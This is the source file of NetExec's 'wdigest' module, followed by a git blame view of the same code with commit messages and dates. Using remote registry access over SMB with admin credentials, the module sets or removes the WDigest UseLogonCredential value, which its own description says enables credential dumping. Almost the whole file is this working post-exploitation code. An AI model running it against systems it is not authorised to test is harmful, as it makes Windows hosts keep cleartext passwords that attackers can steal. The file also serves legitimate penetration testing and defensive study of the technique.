NetExec/nxc/modules/wdigest.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
from sys import exit


class NXCModule:
    name = "wdigest"
    description = "Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1"
    supported_protocols = ["smb"]
    opsec_safe = True
    multiple_hosts = True

    def options(self, context, module_options):
        """
        ACTION  Create/Delete the registry key (choices: enable, disable, check)
        """

        if "ACTION" not in module_options:
            context.log.fail("ACTION option not specified!")
            exit(1)

        if module_options["ACTION"].lower() not in ["enable", "disable", "check"]:
            context.log.fail("Invalid value for ACTION option!")
            exit(1)

        self.action = module_options["ACTION"].lower()

    def on_admin_login(self, context, connection):
        if self.action == "enable":
            self.wdigest_enable(context, connection.conn)
        elif self.action == "disable":
            self.wdigest_disable(context, connection.conn)
        elif self.action == "check":
            self.wdigest_check(context, connection.conn)

    def wdigest_enable(self, context, smbconnection):
        remote_ops = RemoteOperations(smbconnection, False)
        remote_ops.enableRegistry()

        if remote_ops._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
            reg_handle = ans["phKey"]

            ans = rrp.hBaseRegOpenKey(
                remote_ops._RemoteOperations__rrp,
                reg_handle,
                "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",
            )
            key_handle = ans["phkResult"]

            rrp.hBaseRegSetValue(
                remote_ops._RemoteOperations__rrp,
                key_handle,
                "UseLogonCredential\x00",
                rrp.REG_DWORD,
                1,
            )

            rtype, data = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, "UseLogonCredential\x00")

            if int(data) == 1:
                context.log.success("UseLogonCredential registry key created successfully")

        try:
            remote_ops.finish()
        except Exception:
            pass

    def wdigest_disable(self, context, smbconnection):
        remote_ops = RemoteOperations(smbconnection, False)
        remote_ops.enableRegistry()

        if remote_ops._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
            reg_handle = ans["phKey"]

            ans = rrp.hBaseRegOpenKey(
                remote_ops._RemoteOperations__rrp,
                reg_handle,
                "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",
            )
            keyHandle = ans["phkResult"]

            try:
                rrp.hBaseRegDeleteValue(
                    remote_ops._RemoteOperations__rrp,
                    keyHandle,
                    "UseLogonCredential\x00",
                )
            except Exception:
                context.log.success("UseLogonCredential registry key not present")

                try:
                    remote_ops.finish()
                except Exception:
                    pass

                return

            try:
                # Check to make sure the reg key is actually deleted
                rtype, data = rrp.hBaseRegQueryValue(
                    remote_ops._RemoteOperations__rrp,
                    keyHandle,
                    "UseLogonCredential\x00",
                )
            except DCERPCException:
                context.log.success("UseLogonCredential registry key deleted successfully")

                try:
                    remote_ops.finish()
                except Exception:
                    pass

    def wdigest_check(self, context, smbconnection):
        remote_ops = RemoteOperations(smbconnection, False)
        remote_ops.enableRegistry()

        if remote_ops._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
            reg_handle = ans["phKey"]

            ans = rrp.hBaseRegOpenKey(remote_ops._RemoteOperations__rrp, reg_handle, "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest")
            key_handle = ans["phkResult"]

            try:
                rtype, data = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, "UseLogonCredential\x00")
                if int(data) == 1:
                    context.log.success("UseLogonCredential registry key is enabled")
                else:
                    context.log.fail(f"Unexpected registry value for UseLogonCredential: {data}")
            except DCERPCException as d:
                if "winreg.HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" in str(d):
                    context.log.fail("UseLogonCredential registry key is disabled (registry key not found)")
                else:
                    context.log.fail("UseLogonCredential registry key not present")
            try:
                remote_ops.finish()
            except Exception:
                pass
Adding shebang and encoding utf-8 for all python files 2022-07-18 23:59:14 +00:00			`#!/usr/bin/env python3`
			`# -- coding: utf-8 --`

Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`from impacket.dcerpc.v5.rpcrt import DCERPCException`
			`from impacket.dcerpc.v5 import rrp`
			`from impacket.examples.secretsdump import RemoteOperations`
			`from sys import exit`

Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`class NXCModule:`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`name = "wdigest"`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`description = "Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1"`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`supported_protocols = ["smb"]`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`opsec_safe = True`
			`multiple_hosts = True`

			`def options(self, context, module_options):`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`"""`
Changed context.log and added check to menu 2023-06-28 23:03:27 +00:00			`ACTION Create/Delete the registry key (choices: enable, disable, check)`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`"""`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
automatic ruff fixing 2023-09-20 15:59:16 +00:00			`if "ACTION" not in module_options:`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`context.log.fail("ACTION option not specified!")`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`exit(1)`

Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`if module_options["ACTION"].lower() not in ["enable", "disable", "check"]:`
			`context.log.fail("Invalid value for ACTION option!")`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`exit(1)`

Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`self.action = module_options["ACTION"].lower()`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
			`def on_admin_login(self, context, connection):`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`if self.action == "enable":`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`self.wdigest_enable(context, connection.conn)`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`elif self.action == "disable":`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`self.wdigest_disable(context, connection.conn)`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`elif self.action == "check":`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00			`self.wdigest_check(context, connection.conn)`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
			`def wdigest_enable(self, context, smbconnection):`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops = RemoteOperations(smbconnection, False)`
			`remote_ops.enableRegistry()`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`if remote_ops._RemoteOperations__rrp:`
			`ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)`
			`reg_handle = ans["phKey"]`
black formating 2023-05-02 15:17:59 +00:00
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`ans = rrp.hBaseRegOpenKey(`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops._RemoteOperations__rrp,`
			`reg_handle,`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`"SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",`
			`)`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`key_handle = ans["phkResult"]`
black formating 2023-05-02 15:17:59 +00:00
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`rrp.hBaseRegSetValue(`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops._RemoteOperations__rrp,`
			`key_handle,`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`"UseLogonCredential\x00",`
			`rrp.REG_DWORD,`
			`1,`
			`)`
black formating 2023-05-02 15:17:59 +00:00
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`rtype, data = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, "UseLogonCredential\x00")`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
			`if int(data) == 1:`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`context.log.success("UseLogonCredential registry key created successfully")`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
			`try:`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops.finish()`
			`except Exception:`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`pass`

			`def wdigest_disable(self, context, smbconnection):`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops = RemoteOperations(smbconnection, False)`
			`remote_ops.enableRegistry()`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`if remote_ops._RemoteOperations__rrp:`
			`ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)`
			`reg_handle = ans["phKey"]`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`ans = rrp.hBaseRegOpenKey(`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops._RemoteOperations__rrp,`
			`reg_handle,`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`"SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",`
			`)`
			`keyHandle = ans["phkResult"]`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
			`try:`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`rrp.hBaseRegDeleteValue(`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops._RemoteOperations__rrp,`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`keyHandle,`
			`"UseLogonCredential\x00",`
			`)`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`except Exception:`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`context.log.success("UseLogonCredential registry key not present")`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00
			`try:`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops.finish()`
			`except Exception:`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`pass`

			`return`

			`try:`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`# Check to make sure the reg key is actually deleted`
			`rtype, data = rrp.hBaseRegQueryValue(`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops._RemoteOperations__rrp,`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`keyHandle,`
			`"UseLogonCredential\x00",`
			`)`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`except DCERPCException:`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`context.log.success("UseLogonCredential registry key deleted successfully")`

Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`try:`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops.finish()`
			`except Exception:`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`pass`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00
			`def wdigest_check(self, context, smbconnection):`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops = RemoteOperations(smbconnection, False)`
			`remote_ops.enableRegistry()`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`if remote_ops._RemoteOperations__rrp:`
			`ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)`
			`reg_handle = ans["phKey"]`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`ans = rrp.hBaseRegOpenKey(remote_ops._RemoteOperations__rrp, reg_handle, "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest")`
			`key_handle = ans["phkResult"]`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00
			`try:`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`rtype, data = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, "UseLogonCredential\x00")`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00			`if int(data) == 1:`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`context.log.success("UseLogonCredential registry key is enabled")`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00			`else:`
fix string interpolation 2023-09-24 04:06:51 +00:00			`context.log.fail(f"Unexpected registry value for UseLogonCredential: {data}")`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00			`except DCERPCException as d:`
Fixed single and double quotes 2023-06-27 17:36:43 +00:00			`if "winreg.HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" in str(d):`
Changed context.log and added check to menu 2023-06-28 23:03:27 +00:00			`context.log.fail("UseLogonCredential registry key is disabled (registry key not found)")`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00			`else:`
Changed context.log and added check to menu 2023-06-28 23:03:27 +00:00			`context.log.fail("UseLogonCredential registry key not present")`
Added option to wdigest module to check reg key 2023-06-27 13:38:26 +00:00			`try:`
cleanup wdigest module 2023-09-22 19:27:05 +00:00			`remote_ops.finish()`
			`except Exception:`
			`pass`